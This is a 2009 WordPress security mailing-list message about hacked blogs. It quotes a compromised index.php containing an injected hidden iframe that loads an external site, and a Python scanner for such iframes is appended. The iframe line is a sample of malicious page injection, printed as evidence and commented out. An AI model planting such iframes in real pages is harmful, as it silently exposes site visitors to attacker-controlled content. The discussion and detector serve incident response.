[wp-hackers] Hacked blogs
Peter van der Does
peter at avirtualhome.com
Thu Mar 26 16:25:41 GMT 2009
On Thu, 26 Mar 2009 13:56:27 +0100
Joost de Valk <joost at yoast.com> wrote:
> Harish Narayanan wrote:
> > Joost de Valk wrote:
> >> Hey guys,
> >>
> >> I've been restoring 5 hacked blogs the last few days, all running
> >> 2.7.1 but spread over different hosts, can't find the hole yet
> >> that they're getting in through, but I'd thought I'd send out a
> >> warning to all of you that something seems to be wrong...
> >>
> > Even if you aren't aware of the cause, could you point us to the
> > symptoms so we would know what to look for?
> >
> > Thanks,
> > Harish
> >
> Sorry, should have included that immediately.
>
> Symptoms were, in all cases, iframes being added to the end of all
> index.php files in the blogs, in the footer. In some cases they were
> written with javascript, in other cases they were pure iframes.
>
> Best,
> Joost
A similar situation was reported on December 22, 2008 by madalin
[QUOTE]
Yes that's exactly what I am saying. Here is my index.php:
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
[/QUOTE]
The echo was commented out to keep for future reference according to the
OP.
No final verdict was given. The iframe was also found in
non-WordPress-related sites.
--
Peter van der Does
GPG key: E77E8E98
WordPress Plugin Developer
http://blog.avirtualhome.com
GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
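
A way to sweep a web root for the symptom described in this thread, as an added example that is not part of the original message: it checks every index.php for an iframe and reports whether it is plain markup or written by JavaScript, whether it is styled to be invisible, and whether the line is commented out as in the quoted file. The document.write pattern, the example.invalid URL and the function names are assumptions.

```python
import os
import re

# Heuristics taken from the symptoms in this thread: an <iframe> in index.php,
# either plain/echoed markup or written by JavaScript. Treating document.write
# as the JavaScript form is an assumption; the thread does not show that variant.
IFRAME = re.compile(r"<\s*iframe\b[^>]*>", re.I)
JS_WRITE = re.compile(r"document\.write\s*\(", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none"
                    r"|\b(?:width|height)\s*=\s*\\?[\"']?[01]\b", re.I)

# Constructed samples modelled on the quoted file; example.invalid is a placeholder.
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>\n"
ECHOED = CLEAN.replace("?>", 'echo "<iframe src=\\"http://example.invalid/\\" width=1 '
                       'height=1 style=\\"visibility:hidden\\"></iframe>";\n?>')
SCRIPTED = CLEAN + ("<script>document.write('<iframe "
                    "src=\"http://example.invalid/\"></iframe>')</script>\n")


def scan_source(text):
    """Return (line_no, kind, hidden, commented_out) for each iframe line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not IFRAME.search(line):
            continue
        kind = "javascript" if JS_WRITE.search(line) else "markup"
        commented = line.lstrip().startswith(("//", "#"))
        findings.append((no, kind, bool(HIDDEN.search(line)), commented))
    return findings


def scan_tree(root):
    """Scan every index.php under root; return {path: findings} for hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if "index.php" in files:
            path = os.path.join(dirpath, "index.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if found:
                hits[path] = found
    return hits


if __name__ == "__main__":
    for name, src in (("clean", CLEAN), ("echoed", ECHOED), ("scripted", SCRIPTED)):
        print(name, scan_source(src))
```

A theme that embeds a legitimate iframe in its own index.php will also be reported, so treat hits as files to review against a known-good copy rather than as a verdict.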